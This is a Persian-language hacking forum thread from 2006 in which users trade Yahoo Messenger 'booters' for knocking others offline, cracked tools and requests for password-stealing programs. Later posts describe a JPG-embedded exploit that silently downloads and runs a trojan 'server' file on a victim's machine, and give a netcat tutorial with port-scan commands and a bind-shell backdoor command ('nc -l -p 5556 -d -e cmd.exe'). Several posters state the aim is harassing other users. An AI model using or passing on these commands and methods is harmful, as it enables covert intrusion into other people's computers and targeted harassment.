با سلام خدمت دوست عزيزم اشكان وبقيه دوستان يك راهنمايي ميخواستم من بعضي از برنامه هاي وي سي و يا فريز رو كه دانلود ميكنم باز نمي شه وپيغام زيرو ميده البته فايل نت رو هم دانلود كردم ولي نميدونم دروست نصب نشد يا چيزه ديگه ايست لطفا هر كدوم از دوستان كه ميتونن راهنمايي كامل بفرمايند .با تشكر فراوان اميدD:\WINDOWS\Microsoft.NET\Framework\v1,1,43 22\mscorowks.dll could not be loaded

*NashenaS*
14-03-2006, 22:52
اميد عزيز...
از اين لينك فايل مورد نظرو رو دانلود كن.

Lord عزيز...
برنامه رو برات به زودي مي زارم...

omid.com
15-03-2006, 10:58
ba arze mazerat bazi vaghta har kari mikonam farsi taaip nemikone .ashkan jan man failo dar hamon adrsi ke dadae bod rikhtam vali javab nadad zemne inke be on adres vaghti miram to dasgahe man vergene 1.0.3705hastesh fekr konam az ebteda faile NET ro eshtebah danlod kardam ye zahmati bekesh va linke danlode NET v1.1.4322 ro fvhl fchv shayed moshgelam hal beshe mamnon .omid

koochooloo
15-03-2006, 16:46
omid jan vere jadie file net ro barat to sitam gozashtam zemnan ki gofte magic ro yaho 7.5 kar nemikone man khodam hade agal 10 ta id zadam onam yaho7.5 fagat irade in barname inke ke zood anti ha migirateshon va lo miiri pass behtare beroz az ina estefade koni ya inke vere polie in no barname haro begiri ya hagh
kari dashtin inja ya to sitam begid mamnon azizan
fonte farsi nadaram va gar na farsi mineveshtam
bye

nazali
15-03-2006, 17:06
خسته نباشيد

jarooo_khakandaz
15-03-2006, 23:07
عزيزان سلام يك كمكي مي خواستم.....
برنامه هاي زير را لازم دارم.....
1.برنامه اي كه با اون بتونم پسورد يك ايدي را پيدا كنم.....
2.بتونم يك ايدي را از بين ببرم.....
3. در چت روم من بتونم هميشه حرف بزنم منو قطع نكنند ...
من بتونم در هر اتاق پري برم.....
يك ايدي را هم مي خواهم برام از بين ببريد...........
shagerde_alborz@yahoo.com
برنامه اي لازم داشتم كه بتونم ايدي را هر وقت خواستم بسوزونم بشه..

jarooo_khakandaz
15-03-2006, 23:07
ممنون...................................

saeid_saeid
16-03-2006, 18:10
سلام جيگرا
ميتونين واسم exploite kaht II Ful ver رو گير بيارين.
اگه اين كارو بكنينخيلي ممنونميشم.

K053_LSH_KV90
16-03-2006, 18:38

تو اينجا پر اكسپوليته

saeid_saeid
17-03-2006, 13:13
كوسه جون دستت دردنكنه ولي اونيكه من مي‌خواستم اينجا نيست.

omid.com
18-03-2006, 08:09
با سلام فراوان خدمت تمامي دوستان اشكان جان وبابك جان و .... من يه نرم افزار ميخوام كه در مورد اد كردن ايدي داخل مسنجر بدون كسب اجازه از طرف مقابلباشه البته واقعا" كار كنه چون برنامه هايي مثله مس دانيل رو امتحان كردم ولي جواب نميده .ممنون از شما اميد

*NashenaS*
18-03-2006, 16:42
با سلام فراوان خدمت تمامي دوستان اشكان جان وبابك جان و .... من يه نرم افزار ميخوام كه در مورد اد كردن ايدي داخل مسنجر بدون كسب اجازه از طرف مقابلباشه البته واقعا" كار كنه چون برنامه هايي مثله مس دانيل رو امتحان كردم ولي جواب نميده .ممنون از شما اميد
اميد جان...
همه جا ديديم زوركي از ليست ديگران پاك كنن خودشون... زور چپوني و ديگه نديده بوديم... :laughing:
باشه... مي گردم پيدا كردم مي زارم...

omid.com
18-03-2006, 19:33
اشكان خدا بگم چيكارت كنه 1 ساعت خنديدم درخواست يكي از روفقاست كچلم كرده منم گفتم ميرم تو تاپيك كاردرست اشكان مطرح ميكنم تا پيدا شه .ماكه فقط برات زحمت داريم .قربانت اميد :laughing: l

omid.com
18-03-2006, 23:49
با سلام مجدد .دوستان گرامي من براي باز شدن برنامه فانتوم وي سي فايل نت رو دانلود كردم ولي بازم وقتي فانتوم وي سي رو باز ميكنم يك ويندوي كوچيك باز ميشه و اين پيغامو ميده كه در زير براتون نوشتم لطفا" راهنمايي بفرماييد CLR error:80004005.theprogram will now terminate يدفه هم از جاي ديگه دانلود كردم فانتوم رو كه وقتي اونو باز ميكنم يه پيغام ديگه مي ده كه اون پيغامم اينه The remote server retuned an erroe:(404)Not Foun البته در بيشتر مواقع وقتي هر دو مدل دانلودمو باز ميكنم 2 تا ويندوي كوچيك روي هم باز مي شه كه يكيشون عنوانش فانتوم وي سي و داخلش يه ال نوشته زيرشم يه گزينه اوكي داره و ويندوي ديگه اين پيغامو ميدهindex was outside bounds of array

MOH333EN
19-03-2006, 01:23
سلام بچه ها تو رو خدا من یک مزاحم پیدا کردم یک بوتر بزارید که کار باهاش خیلی راحت باشه و رو یاهو جدید هم جواب بده ممنونش میشم

saeid_saeid
19-03-2006, 10:31
سلام بچه ها تو رو خدا من یک مزاحم پیدا کردم یک بوتر بزارید که کار باهاش خیلی راحت باشه و رو یاهو جدید هم جواب بده ممنونش میشم

اينم يه بوتر كه كارش هم درسته هم راحت.

فقط بايد تو يه فايل متني يوزر‌نيم پسورد چنتا اي‌دي تو (بجز اون آي‌دي كه باهاش چت ميكني) رو ذخيره كني. به اينصورت:
Yahoo ID1:Pass
Yahoo ID2:Pass
...
تا 10000 آي‌دي مي‌توني بدي.كه هرچي بيشتر باشه بهتره. اون پايين به جايه ويكتيم ID اون مزاحم رو بنويس. از قسمت Bots هم تعداد ID كه مي‌خواي لوگين بشي رو انتخاب كن. و بعد رو Login كليك كن. دگه بغيش رو خودت مي‌دوني چيكار مي‌خواي باهاش بكني. به همين راحتي.

saeid_saeid
19-03-2006, 10:46
اينم يه اكسپلويته توپ.

فقط كافيه فايل سرورتونو تو يه جا (مثلا پرشين گيگ) آپلود كني. بعد لينكشو به اين بدي تا وسط يه فايل JPG.* درست كنه. بعد اون فايل عكس رو تو وبلاگ يا همون پرشين گيگت آپيود كن و لينكشو واسه قربانيت بفرست. اون وقط فايل سرور بدون سرو صدا داون‌لود و اجرا مي‌شه.

j0l6
19-03-2006, 15:02
سلام دوستان این فایل bot خودتون رو به اشتراک نمیزارین ؟نمیتونم زیاد ای دی درست کنم راستش یکی از دوستام به شوخی حالمو گرفت حالا من هم میخوام باهاش شوخی کنم ولی این فایل بوت روندارم

سعید اگه سرور رو هم میزاشتی بد نبود

K053_LSH_KV90
19-03-2006, 19:53
سينا من يه بار تو يه جايي گذاشتم يه نامرد تمام پسورد هامو عوض كرد
------------
اگر يه جور باشه كه بين خودمون باشه بهتره كه بين همه باشه چون يكي تازه وارد مياد همه رو ميخفته :d

*NashenaS*
19-03-2006, 20:00
سلام...
درخاست بوتر ها رفته بالا هاا.... اين نشونه ازار و اذيته.. :laughing: .
نكنين بابا ا.... :laughing:

امروز يه سري بوتر مي زارم براتون...

ZONE Hunter Max 39.1
HelpFileVers.008.1 1-6-2006 ©2004~06

1 Smart Boot Elite v14-Cracked

Download ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ](1).rar)

YFamev14

*NashenaS*
19-03-2006, 20:01
سينا من يه بار تو يه جايي گذاشتم يه نامرد تمام پسورد هامو عوض كرد
------------
اگر يه جور باشه كه بين خودمون باشه بهتره كه بين همه باشه چون يكي تازه وارد مياد همه رو ميخفته :d

اره راس ميگه... منم اين بلا سرم اومده يه بار... اما حالا يه دونه مي زارم استفاده كني... ;)

saeid_saeid
19-03-2006, 20:45
سعید اگه سرور رو هم میزاشتی بد نبود
خوب جيگر فال سرور رو ديگه خودت بتيد درست كني ديگه. مثلا ماله Magic-PS يا هر چيزه ديگه.

j0l6
19-03-2006, 21:49
راستش دوستان من چوننمیتونم خودم بسازم گفتم شما که دارین بزارین چون فکر کردم ای دی بدرد بخور یا مهمی واستون نیستنو فقط واسه بوت کردن ساختین اصلا فکر نمیکردم کسی به فکر عوض کردن پسورد این جور ای دی ها هم بیوفته. دوستان اگه میشه اون برنامه ای که واسه ساختن ای دی ازش استفاده میکنین رو بزارین تا خودم بسازم راستش چنتا دارم ولی کار نمیکنه
اقا سعید منظورم فایل سرور درست حسابی هستش اگه داری بزار تا تنضیماتش رو خودمون انجام بدیم اینی که اینجا نوشتی که از هشت فرسخی تابلو هستش و هر انتی ویروسی شناسایش میکنه

koochooloo
20-03-2006, 02:19
fonte farsi nadaram bache ha midonid
omid jan 2 eshkal dare 1 inke need fil begir na file net ke barat gozashtam to on sitam albate neet file 1.1 ro age dl kardi baz in mishkelo dashti aval boro to sitam file komaki file need dl kon koli tosh file ke to gesmate system 32 winet beriz
badesh phantom vc ke man gozashtamo dl kon ham0n ke man gozashtamo age bazam kar nakard hatman be id man ke to site pm bede ke barat ye phantom sefareshi befrestam ke on hamin alan man bahash vc keshidam
ke age kar nakone winet mayobe va bayad win avaz koni ya hagh
be man sar bezanid ke be komak va nazare shoma niaz daram
rasti ashkal be man pm bede karet daram hesabi
on barname haram be esme khodet gozashtam didi? hatman pm bede be id modire to sitam
ya hagh dostan inja behtarine

امین.پ
20-03-2006, 07:20
سعید جان ممنون اما این برنامه فکر کنم مشکل رجیستری داره
Component 'MSINET.OCX' or one of its dependencies not correctly registered: a file is missing or invalid
اینم ارورش

K053_LSH_KV90
20-03-2006, 07:51
امين جان اول اين فايل رو دانلود كن
حالا برو تو run
بنويس reg svr32 MSINET.OCX

حالا دوباره بوتر رو اجرا كن مشكلت حل شدست
------------------
برف بازي مي كني ياد ما هم باش

K053_LSH_KV90
20-03-2006, 08:00

من نمي دونم شما چه جوري ميتوني تو وبلاگت ارسي بنويسي ولي تو فروم نمي توني

اگه واقعا اين مشكل رو داري مگه يه فونت چه قدر حجمشه دانلود كن ونصب كن

تازه ميتوني از En 2 Fa استفاده كني سرچ كن تو همين پي سي ورد هست

saeid_saeid
20-03-2006, 15:18
اقا سعید منظورم فایل سرور درست حسابی هستش اگه داری بزار تا تنضیماتش رو خودمون انجام بدیم اینی که اینجا نوشتی که از هشت فرسخی تابلو هستش و هر انتی ویروسی شناسایش میکنه
منظورت كودومه. اگه منظورت اكسپلويته كه آره . ولي لازم نيست كه اونو بفرستي. فقط بايد لينك عكسو كه آپلودش كردي بفرستي.

امین.پ
21-03-2006, 06:50
امين جان اول اين فايل رو دانلود كن
حالا برو تو run
بنويس reg svr32 MSINET.OCX

حالا دوباره بوتر رو اجرا كن مشكلت حل شدست
------------------
برف بازي مي كني ياد ما هم باش

ممون کوسه جان اما مثل اینکه لینکش خراب شده
اگهه ممکنه یه نگاهی بنداز :blush:

K053_LSH_KV90
21-03-2006, 08:27
معذرت

adameh_bahal
21-03-2006, 08:41
اينم يه اكسپلويته توپ.

فقط كافيه فايل سرورتونو تو يه جا (مثلا پرشين گيگ) آپلود كني. بعد لينكشو به اين بدي تا وسط يه فايل JPG.* درست كنه. بعد اون فايل عكس رو تو وبلاگ يا همون پرشين گيگت آپيود كن و لينكشو واسه قربانيت بفرست. اون وقط فايل سرور بدون سرو صدا داون‌لود و اجرا مي‌شه.
تا اونجا که من ميدونم اين برنامه خيلی وقته که کار نميکنه

امین.پ
21-03-2006, 10:44
ممنون شارک جان حل شد!!!!!!!!

saeid_saeid
21-03-2006, 11:53
تا اونجا که من ميدونم اين برنامه خيلی وقته که کار نميکنه
من امتحان كردم. رو كامپيوتر من كه جواب داد.

saeid_saeid
21-03-2006, 11:59
سعید جان ممنون اما این برنامه فکر کنم مشکل رجیستری داره
Component 'MSINET.OCX' or one of its dependencies not correctly registered: a file is missing or invalid
اینم ارورش

اگه هر برنامه اي اين ارور رو داد مي‌توني فايل موردنيازشو از اينجا ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]) بگيري

adameh_bahal
21-03-2006, 16:00
من امتحان كردم. رو كامپيوتر من كه جواب داد.
شما کی امتحان کردی

saeid_saeid
21-03-2006, 19:10
دو روز پيش

koochooloo
21-03-2006, 19:29
من نمي دونم شما چه جوري ميتوني تو وبلاگت ارسي بنويسي ولي تو فروم نمي توني

اگه واقعا اين مشكل رو داري مگه يه فونت چه قدر حجمشه دانلود كن ونصب كن

تازه ميتوني از En 2 Fa استفاده كني سرچ كن تو همين پي سي ورد هست
azizam in ba on koli farg dare
albate man age mitonestam fonte farsi nasb mikardam
vali vase bazi mavared nemishe
zemnan to weblage man fonte farsi nasbe vali inja nist va manam nemitonam in karo bokonam
zemnan hamishe ke ro pc khodam nistam ke fingilisho baz konam va bahash kar konam
ya hagh
movafag bashin

*NashenaS*
21-03-2006, 21:36
azizam in ba on koli farg dare
albate man age mitonestam fonte farsi nasb mikardam
vali vase bazi mavared nemishe
zemnan to weblage man fonte farsi nasbe vali inja nist va manam nemitonam in karo bokonam
zemnan hamishe ke ro pc khodam nistam ke fingilisho baz konam va bahash kar konam
ya hagh
movafag bashin
شما با فاير فاكس كار مي كني كه فارسي از قبل درش نيست...
اگه با اينترنت اكسپلورر كار كني... اينجا به راحتي ميشه تايپ كرد... قانون فروم رو هم در نظر نگيري... خوندن فيلگيليش سخته...
اين هم لينك فارسي ... من شخصا از اين استفاده مي كنم.

موفق باشي.

WooKMaN
21-03-2006, 23:00
حالا تو اين گير و واگير يه سوال :

از بوتر بجز واسه حالگيري چه استفاده اي مي كنيد ؟

WooKMaN
21-03-2006, 23:01
سلام...
درخاست بوتر ها رفته بالا هاا.... اين نشونه ازار و اذيته.. :laughing: .
نكنين بابا ا.... :laughing:

امروز يه سري بوتر مي زارم براتون...

ZONE Hunter Max 39.1
HelpFileVers.008.1 1-6-2006 ©2004~06

1 Smart Boot Elite v14-Cracked

Download ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ](1).rar)

YFamev14

اشكان جان لينك ها واسه من ----- شده !!!
:sad:

*NashenaS*
22-03-2006, 01:04
اشكان جان لينك ها واسه من ----- شده !!!
:sad:
داداشي برات يه جا ديگه اپلود مي كنم خوبه؟ ;)

spartan2
22-03-2006, 03:17
با با اين سايتها كه شما بعضي از اين برنامه ها را آپلود كرده ايد بسته است. مثل

تكليف ما چيه؟

komail
23-03-2006, 16:41
تو يه آموزش خوندم که بايد گزينه no network detection رو انتخاب کنم تا درست شه
ولي نشد

omid.com
24-03-2006, 00:51
omid jan 2 eshkal dare 1 inke need fil begir na file net ke barat gozashtam to on sitam albate neet file 1.1 ro age dl kardi baz in mishkelo dashti aval boro to sitam file komaki file need dl kon koli tosh file ke to gesmate system 32 winet beriz
badesh phantom vc ke man gozashtamo dl kon ham0n ke man gozashtamo age bazam kar nakard hatman be id man ke to site pm bede ke barat ye phantom sefareshi befrestam ke on hamin alan man bahash vc keshidam
ke age kar nakone winet mayobe va bayad win avaz koni ya hagh
be man sar bezanid ke be komak va nazare shoma niaz daram
rasti ashkal be man pm bede karet daram hesabi
on barname haram be esme khodet gozashtam didi? hatman pm bede be id modire to sitam
ya hagh dostan inja behtarine
بابك جان من هم توسايتت نوشتم ئهم اينجا تمام اون كارهارو كردم فايل نت و فايلاي نيد و غيره ولي فكر كنم فايل نيدي كه ارور من بود توشون نيست اين جور كه معلومه كسي راه حل مشكل منونميدونه در هر صورت الوعده وفا اوني كه خودت باهاش كار ميكني رو برام بفرست ببينم باز ميشه يا نه .من توصفحاي قبل نوشتم چه اروري ميده اگه دوستان ديگه ميتونن بگن اون فايلو از كجا دان كنم كه ممنون ميشم در هر صورت بابك جان اينم ايميل من omid_optision@yahoo.com

K053_LSH_KV90
24-03-2006, 07:31
بچه نسخه جديد ياهو همين ديروز بود كه اومده بود كسي چيزه جديدي سراغ نداره كه اينو گاز بگيره ؟؟؟

lovlysms4u
24-03-2006, 22:48
EnVision Yahoo Robot

آيا تا به حال راجع به روبات ياهو چيزى شنيده ايد؟
روبات ياهو نرم افزارى مى باشد که شما مى توانيد پاسخگويى خودکار را براى
يک آى دى ياهو تعريف کنيد. در واقع براى يک پيام ارسالى خاص، به طور خودکار
جوابى معين مى دهد؛ که اين مسئله توسط ارتباط برنامه با بانک اطلاعاتى خود
اتفاق مى افتد.
امکاناتش از جمله: :ohno :rolleye:
• سرعت بالا
• امنيت بالا
• امکان کنترل از راه دور (Web Remote Full Access)
• اسکريپت EnVision از زبانهاى Pascal Script , C++ Script, Java script و
Basic Script پشتيبانى مى کند.
• استفاده هم زمان از چند Plug-in
• Spam Guard
• Enable Ignore
• Enable Log
• Ignore offline
• Hot Key

همچنين حجم Demo برنامه 915 کيلوبايت مى باشد .
سایت سازنده ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ])
دانلود ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ])

partizan
25-03-2006, 01:20
بابا بي خيال ان كه پولي اگه كرك داشت خوب بود

koochooloo
25-03-2006, 04:02
Omid Jan Manam Vere Dige Ey Nadaram Phantom Hamone Ke Dari Age Hame Karaee Ke Goftamo Kardi Baz Nashood Barnamaro Bebar Ro Ye Pc Dige Ejrakon Age Baz Shood Mosh Kele Aslie Shoma Winete Ke Bayad Avaz Beshe Chon In Barname
Ke Man Gozashtam Akharin Ver Az Phantom Vc Hast Ke Man Rozi 100 Bar Bahash Vc Mikesham Va Kar Mikone Yahgah Movafagh Bashi Onjam Goftam Kari Dashti Pm Bede Ke Bekaret Zod Tar Beresam To Sit Zade Id Mano Ya Hgah

neshimangaz
27-03-2006, 00:24
منظورت چيه؟

Elfin-D
27-03-2006, 11:19
چند وقتي هست كه سرور ياهو قاطيه!
يا سرور ياهو شلوغه يا سرور اي اس پي شما.
اگر بعد از اين مشكل كمي صبر كنيد و دوباره سعي كنيد حتما حل ميشه

saeid_saeid
28-03-2006, 11:43
اگه خواستین حال بگیرین می تونین از این لینک هم استفاده کنید.

*NashenaS*
28-03-2006, 17:32

لينك دانلود قير مستقيم...

Download ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] )

atsonix
31-03-2006, 07:23
اين كه احتياج به ويندوز سرور يا ان تي داره ؟؟؟؟؟

saeid_saeid
01-04-2006, 12:56
ايني كه واستون گزاشتم به چاقوي همه كاره هك معروفه.
مي‌تونين باهاش Portهاي يه IP رو چك كنين بهش تلنت كنين به عنوان Backdoor ازش استفاده كنين.ديگه از اين بهتر چي‌ميخواين.

داون لود كنين الان آموزشش رو مي‌زارم.

Dark-man
01-04-2006, 13:00
آقا كسي برنامه web dav را نداره؟؟

saeid_saeid
01-04-2006, 15:22
اول بايد اين فايل رو تو سيتم روتتون كپي كنيد.

اول واسه اينكه يه رنج يا يه تك Port از Portهاي يه IPرو چك كنيم.

واسه اين كار cmd.exe رو باز كنين و اينو تايپ كنين.
nc -vv -w 3 -z 127.0.0.1 1-100
nc : اجرايه برنامس.
-v : براي اينكه Portihd باز رو نشون بده.
-w2 : بعد از w مدت زمان انتظار براي دريافت پيغام ارسالي به پورت رو تعيين مي‌كنيم
-z : واسه سرعت بخشيدن به كار.
127.0.0.1 : تو اينجا بايد IP طرف رو بنويسيد.
1-100 : تو اينجا يك رنج از Port يا فقط يه Port خاص رو كه مي‌خواين واستون اسكن كنه رو تعيين مي‌كنين.

----------------------------------------------------------------------

اگه بخواين به عنوان Backdoor استفاده كنيم.

nc -l -p 5556 -d -e cmd.exe
nc : اجراي برنامه
-l : اجراي حالت Listen براي گوش دادن به يك Port
-p : بعد از p- بايد Portي كه مي‌خواين واستون باز كنه رو بديد كه تو اين مثال 5556رو من دادم
-d -e : بعد از اينم فايلي رو كه مي‌خواين پوشته اون Port باشه رو مي‌دين كه اينجا cmd.exe رو من گزاشتم

----------------------------------------------------------------------

براي اتصال به كامپيوتر

nc 127.0.0.1 5556
-nc :اجراي برنامه
127.0.0.1 : اينجا IP طرف رو بايد بنويسيد.
5556 : اينجا هم Port رو بايد انتخاب كنين.

Hidden-H
01-04-2006, 15:57
اين برنامه ها همه ----- هستن
چي كار كنم؟

saeid_saeid
01-04-2006, 18:44
اين برنامه ها همه ----- هستن
چي كار كنم؟
كدوما؟ [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

Dark-man
01-04-2006, 18:52
سعيد جان اين برنامه web dav را داري؟؟

saeid_saeid
01-04-2006, 19:12
ها ايكه الا گفتي يعني چه؟(يعني اين چي هست به چه كار مي‌ايد. شايد يدونه معادلشو داشته باشم) [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

Dark-man
01-04-2006, 19:58
يه برنامه براي ديفيس كردن سايت هستش ...

radepa
02-04-2006, 00:35
جديدترين بوترهای ياهو

چهار شنبه ۰۹ فروردين ۱۳۸۵

toolmaker-gold

THE-ONE

Limited-Access v4

Immortals-Power-Smack

GMC--ChatClientBooterv.2

Destruction

BetterBomber

خوش باشيد

Numb
02-04-2006, 01:15
لطفا يه برنامه بديد كه پسورد طرف رو هك كنم.

alir3za
02-04-2006, 11:26
جديدترين بوترهای ياهو

چهار شنبه ۰۹ فروردين ۱۳۸۵

toolmaker-gold

THE-ONE

Limited-Access v4

Immortals-Power-Smack

GMC--ChatClientBooterv.2

Destruction

BetterBomber

خوش باشيد

آقا واقعا دمت گرم خيلي باحال بود
از كسيكه اين تاپيكو ايجاد كرده و بقيه ي دوستان هم كمال تشكرو دارم
خيلي حال دادين

j0l6
02-04-2006, 13:21
مرسی دوستان بوتر ها ی خوبی هستن ولی خفن نیستن

اگه pm ها بسته باشن کار نمیکنن اونوقت پیشه دوست ضایع میشی
میگم دوستان از این بوترا استفاده میکنین همینجوری کسی رو بوت نکنینا ممکنه من باشم ;) :cool: :happy:

*NashenaS*
02-04-2006, 19:11
آقا واقعا دمت گرم خيلي باحال بود
از كسيكه اين تاپيكو ايجاد كرده و بقيه ي دوستان هم كمال تشكرو دارم
خيلي حال دادين
خواهش مي كنم دوست من... اميدوارم مفيد باشه.

مرسی دوستان بوتر ها ی خوبی هستن ولی خفن نیستن
اگه pm ها بسته باشن کار نمیکنن اونوقت پیشه دوست ضایع میشی
میگم دوستان از این بوترا استفاده میکنین همینجوری کسی رو بوت نکنینا ممکنه من باشم
كسي كه بوت مي كنه بايد توقع بوت شدن هم داشته باشه ديگه نه؟ :laughing:
راجه به بوتر ها هم فرقي نمي كنه پي ام بسته باشه يا نه... بوتر قوي باشه جر ميده! :puke:

j0l6
02-04-2006, 20:03
بو تر قوی یعنی چه جوری باشه با چنتا بوت لاگین کنه ؟ من که هر جوری رو خودم امتحان کردم و نتونست خودمو بوت کنه البته وقتی pm بسته باشه . چند وقت پیش یکی از دوستام خواست بوترش رو ازمایش کنه رو من امتحان کرد یه بوتر که با یه بوت لاکین میکنه و یه اپشن هم بیشتر نداره با اینکه pm هام بسته بود خلی راحت بوت شدم خیلی ساده مسنجرم بسته شد بی هیچ پیغامی !! بعد اون بوتر و به من داد رو خودم که تست کردم جواب نداد فکر کنم از کار افتاده حالا اگه شما همچین بوتری سراغ دارین اون وقت ای ول داره کارتون
:cool: البته الان هم داره ای ول

در ضمن یه چیزی به بوتر های عزیز بگم زیاد بوت نکنین و با بوت ها زیاد لاگین نمونین چون هم بن ای پی میشین هم بوت هاتون از کار میوفته (البته اولی واسه دوستانی که دایل اپ دارن زیاد جدی نیست) این هم از فواید دایل اپ

*NashenaS*
02-04-2006, 20:21
بو تر قوی یعنی چه جوری باشه با چنتا بوت لاگین کنه ؟ من که هر جوری رو خودم امتحان کردم و نتونست خودمو بوت کنه البته وقتی pm بسته باشه . چند وقت پیش یکی از دوستام خواست بوترش رو ازمایش کنه رو من امتحان کرد یه بوتر که با یه بوت لاکین میکنه و یه اپشن هم بیشتر نداره با اینکه pm هام بسته بود خلی راحت بوت شدم خیلی ساده مسنجرم بسته شد بی هیچ پیغامی !! بعد اون بوتر و به من داد رو خودم که تست کردم جواب نداد فکر کنم از کار افتاده حالا اگه شما همچین بوتری سراغ دارین اون وقت ای ول داره کارتون
:cool: البته الان هم داره ای ول

در ضمن یه چیزی به بوتر های عزیز بگم زیاد بوت نکنین و با بوت ها زیاد لاگین نمونین چون هم بن ای پی میشین هم بوت هاتون از کار میوفته (البته اولی واسه دوستانی که دایل اپ دارن زیاد جدی نیست) این هم از فواید دایل اپ
سينا جان اره گاهي اوقات بوتر هايي مي بيني ساخته مي شه كه ادم حال مي كنه...
حالا من يه سري مي زارم جديدن... اميدوارم به كارت بياد.
اگه خوب جواب داد بگو كه ديگران هم استفاده كنن.

اين بوتر پولي هست خوب؟ خودتون بدونين يعني چي ديگه ;)
من خودم عاشق اينم :evil:

عكس هاش:

j0l6
02-04-2006, 20:38
اشکان جان لینکش خرابه نات فاوند میده
ولی چه ریخته خفنی داره همه چی توش پیدا میشه خودم هم میرم دنبالش ببینم پیدا میشه یا نه اگه نشد دیگه زحمتش میوفته پای خودت تا فردا شب اگه جواب ندادم و امکان اپلودش رو داشتی اپ کن
فعلا خوش باشی

j0l6
02-04-2006, 21:47
اشکان اخرین ورژن این بوتر همینه؟؟ چون من تو گوگل سرچش میکنم ورژن های 9 10 14 رو برام میاره

*NashenaS*
02-04-2006, 23:03
اشکان جان لینکش خرابه نات فاوند میده
ولی چه ریخته خفنی داره همه چی توش پیدا میشه خودم هم میرم دنبالش ببینم پیدا میشه یا نه اگه نشد دیگه زحمتش میوفته پای خودت تا فردا شب اگه جواب ندادم و امکان اپلودش رو داشتی اپ کن
فعلا خوش باشی
اره لينكش خراب شده... درست مي كنم حالا...
خداي بوتر هاست.. البته هستن باز چيزاي مورد علاقه من...

اشکان اخرین ورژن این بوتر همینه؟؟ چون من تو گوگل سرچش میکنم ورژن های 9 10 14 رو برام میاره
نمي دونم جديدن كدوم ورژنش رو كاره اما اگه مجانيش و گير بياري خوش شانسي... ضمنا اينجا هم بزار كه بچه ها استفاده كنن.

ibm_dark
03-04-2006, 01:18
مشكل من الان اين هستش كه لينكا اكثرشون باز نميشه

j0l6
03-04-2006, 13:54
من ورژن کرک شده ی این رو داون کردم اما بوت ها رو لاگین نمیکنه یه ورژن دیگه هم دانلود کردم که یه فایل setup داره اما نورتون اونو ویروس تشخیص میده ونمیزاره نصب کنم
این برنامه نیاز به نصب شدن داره؟؟

*NashenaS*
03-04-2006, 17:48
مشكل من الان اين هستش كه لينكا اكثرشون باز نميشه
منظورت چيه اين لينك ها اكثرشون باز نميشه؟ يعني نمي توني دانلود كني؟

من ورژن کرک شده ی این رو داون کردم اما بوت ها رو لاگین نمیکنه یه ورژن دیگه هم دانلود کردم که یه فایل setup داره اما نورتون اونو ویروس تشخیص میده ونمیزاره نصب کنم
این برنامه نیاز به نصب شدن داره؟؟
نه اين نيازي به نصب نداره ... من توي برنامه هام داشتم اما اينقده من سي دي دارم كه نمي دونم كدومشونه... :tongue:

Masoud.M.N
04-04-2006, 02:56
با سلام خدمت آقا اشکان عزيز
تاپيک بسيار خوبيه اما يک مشکلي هست تمام لينک هايي که مربوط به سايت [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] گذاشتيد براي دانلود نرم افزارهاي يوزر و پسورد لازم داره چندتا از دوستان ديگم اين مشکا را داشتند اما من پاسخي نديدم کسي داده باشه.
لينکي هم که براي نرم افزار Multi webcam Grabber قرار داديدن در پست شماره 127 اين لينک هم فاقد اعتبار شده و پيغام زير را ميده.

اگر ميشه لطف کنيد و اين نرم افزار را در سايت [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] آپلود کنيد

با تشکر
مسعود

royaye_talkh55
04-04-2006, 15:09
سلام
اين سايت ميگه فابلها موجود نيست
در ضمن اگه ميشه در جاي ديگه آپ كنيد كنيد غير از رپيد شير
چند تا از نرم افزار هاي موجود در صفحه قبل رو دانلود كردم اما نمي شد باز كرد و ارور مي داد
من يه بوتر قوي مي خوام اگه ميشه برنامه و آموزش رو برام بذاريد
قبلا از زحمات آقا اشكان و ساير دوستان تشكر مي كنم

*NashenaS*
04-04-2006, 17:58
با سلام خدمت آقا اشکان عزيز
تاپيک بسيار خوبيه اما يک مشکلي هست تمام لينک هايي که مربوط به سايت [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] گذاشتيد براي دانلود نرم افزارهاي يوزر و پسورد لازم داره چندتا از دوستان ديگم اين مشکا را داشتند اما من پاسخي نديدم کسي داده باشه.
لينکي هم که براي نرم افزار Multi webcam Grabber قرار داديدن در پست شماره 127 اين لينک هم فاقد اعتبار شده و پيغام زير را ميده.
سلام... بله ظاهرا اين سايت گير داده ... اون برنامه Multi webcam Grabber رو من دانلود نكرده بودم اما سعي مي كنم پيدا كنم يه جاي ديگه اپلود كنم... دوستان ديگه هم اگه دانلود كرده بودن لطف كنن.

سلام
اين سايت ميگه فابلها موجود نيست
در ضمن اگه ميشه در جاي ديگه آپ كنيد كنيد غير از رپيد شير
چند تا از نرم افزار هاي موجود در صفحه قبل رو دانلود كردم اما نمي شد باز كرد و ارور مي داد
من يه بوتر قوي مي خوام اگه ميشه برنامه و آموزش رو برام بذاريد
قبلا از زحمات آقا اشكان و ساير دوستان تشكر مي كنم
در مورد اپلود كردن فايل ها عرض كنم كه من توي ايران نيستم ... نمي دونم كجا فيلتره كجا نيست.. لطف كنين يه جا رو كه همه توافق مي كنين بگين كه من اپلود كنم...

rb97
04-04-2006, 19:26

atolympic
04-04-2006, 20:22
من یه برنامه می خوام که تو یاهو هم زمان بتونم.. چندتا ایدی درست کنم . و با همشون همزمان چت کنم.

*NashenaS*
04-04-2006, 21:04
ممنون....
اين هم كه به نظر من بي نظيره...

لينك:

_AshKaN_hard boot life gold v9

_AshKaN_BlackBeautyv3

فعلا ... :)

radepa
05-04-2006, 01:33
Y!Tunnle Pro V1.3 Built232 + serial
Y! Tunnel Pro

نرم افزار Y!Tunnel تقریبا معروفترین و قوی ترین نرم افزار کاربردی در ضمیه کمک به تمامی کاربران یاهو مسنجر است.
